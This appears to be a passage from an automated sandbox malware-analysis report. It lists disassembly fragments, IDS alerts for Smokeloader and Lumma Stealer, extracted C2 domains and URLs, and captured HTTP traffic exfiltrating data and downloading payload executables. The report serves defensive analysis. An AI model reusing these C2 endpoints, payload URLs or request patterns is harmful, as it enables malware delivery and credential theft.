                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]7_2_00433D0A
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx esi, word ptr [ecx]7_2_00438F15
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]7_2_02136248
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then dec edx7_2_0215B2B7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h7_2_021372C9
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]7_2_021372C9
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then cmp cl, 0000002Eh7_2_021412E0
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_021463DB
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then jmp edx7_2_0213D097
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx esi, word ptr [ecx]7_2_0215917C
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]7_2_02136739
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, 00008000h7_2_021237D7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_021464D8
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_021464EB
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]7_2_02130519
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esi+00000910h]7_2_021475BA
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]7_2_021475BA
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov word ptr [eax], cx7_2_02136B56
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]7_2_02144B47
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esi+30h]7_2_02143B98
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]7_2_02124BD7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]7_2_02129BC7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]7_2_02129BC7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]7_2_02144B47
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]7_2_02122807
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edi, ebx7_2_021568D7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then cmp byte ptr [ebp+00h], 00000000h7_2_021348C7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movzx ebx, byte ptr [edx]7_2_021518E7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+000000C0h]7_2_02130918
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]7_2_02153E13
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+000001E0h]7_2_0212FE1B
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]7_2_02143ECF
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]7_2_02143EFE
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then jmp dword ptr [004421CCh]7_2_0213CF1A
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov edx, dword ptr [esi+00000080h]7_2_02145F55
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov ecx, dword ptr [esp+000000A0h]7_2_02141C89
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then jmp edx7_2_02142D5B
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]7_2_0212CD77
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 4x nop then mov eax, dword ptr [esp+4Ch]7_2_02135D61

                    Networking

                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49708 -> 190.13.174.94:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49709 -> 190.13.174.94:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49710 -> 190.13.174.94:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49711 -> 190.13.174.94:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:49712 -> 190.13.174.94:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53061 -> 190.13.174.94:80
                    Source: TrafficSnort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.8:51397 -> 1.1.1.1:53
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53069 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53070 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53072 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53073 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53079 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53080 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53083 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53084 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53115 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53116 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53117 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53118 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53119 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53120 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53121 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53122 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53123 -> 109.175.29.39:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53124 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53125 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53126 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53127 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53128 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53129 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53130 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53131 -> 190.147.128.172:80
                    Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.8:53132 -> 190.147.128.172:80
                    Source: C:\Windows\explorer.exeNetwork Connect: 109.175.29.39 80
                    Source: C:\Windows\explorer.exeNetwork Connect: 190.13.174.94 80
                    Source: C:\Windows\explorer.exeNetwork Connect: 91.202.233.231 80
                    Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.124 80
                    Source: C:\Windows\explorer.exeNetwork Connect: 190.147.128.172 80
                    Source: C:\Windows\explorer.exeNetwork Connect: 45.129.96.86 80
                    Source: Malware configuration extractorURLs: boredimperissvieos.shop
                    Source: Malware configuration extractorURLs: holicisticscrarws.shop
                    Source: Malware configuration extractorURLs: sweetsquarediaslw.shop
                    Source: Malware configuration extractorURLs: plaintediousidowsko.shop
                    Source: Malware configuration extractorURLs: miniaturefinerninewjs.shop
                    Source: Malware configuration extractorURLs: zippyfinickysofwps.shop
                    Source: Malware configuration extractorURLs: obsceneclassyjuwks.shop
                    Source: Malware configuration extractorURLs: acceptabledcooeprs.shop
                    Source: Malware configuration extractorURLs: whispedwoodmoodsksl.shop
                    Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199689717899
                    Source: Malware configuration extractorURLs: http://dbfhns.in/tmp/index.php
                    Source: Malware configuration extractorURLs: http://guteyr.cc/tmp/index.php
                    Source: Malware configuration extractorURLs: http://greendag.ru/tmp/index.php
                    Source: Malware configuration extractorURLs: http://lobulraualov.in.net/tmp/index.php
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Mon, 27 May 2024 13:23:34 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Mon, 27 May 2024 13:20:02 GMTConnection: keep-aliveETag: "66548882-4f600"Accept-Ranges: bytes
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 May 2024 13:24:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 27 May 2024 13:22:08 GMTETag: "1e5000-6196f67744000"Accept-Ranges: bytesContent-Length: 1986560Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-program
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 23.145.40.124 23.145.40.124
                    Source: Joe Sandbox ViewIP Address: 109.175.29.39 109.175.29.39
                    Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                    Source: Joe Sandbox ViewASN Name: TelmexColombiaSACO TelmexColombiaSACO
                    Source: Joe Sandbox ViewASN Name: BIHNETBIHNETAutonomusSystemBA BIHNETBIHNETAutonomusSystemBA
                    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15070Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20237Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5435Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1206Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569527Host: whispedwoodmoodsksl.shop
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIIJJDHDGCGDHIJDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 5329Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKJJECAEGCBGDHDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 1081Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 113601Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://spqqefesecvvfpt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxgcikcstvjhw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://deiljvysjqajyam.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tgeabjhcrwocia.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hfipxhiwprpsvl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mdyttvvsjifyxv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://faqldvcxoayalcyp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nspuoowkrfsuk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gcvwrsnytusejtdk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jebcasiwwjgorbsq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
                    Source: global trafficHTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bshlmattfttfdb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bngikvknmtdpor.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amkihwobrgvem.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bdtrshdmdsajiin.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://depvhlbmmte.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://barvntqgmwgcruw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cmmajutpfcykk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: dbfhns.in
                    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jrlquvadpwx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: dbfhns.in
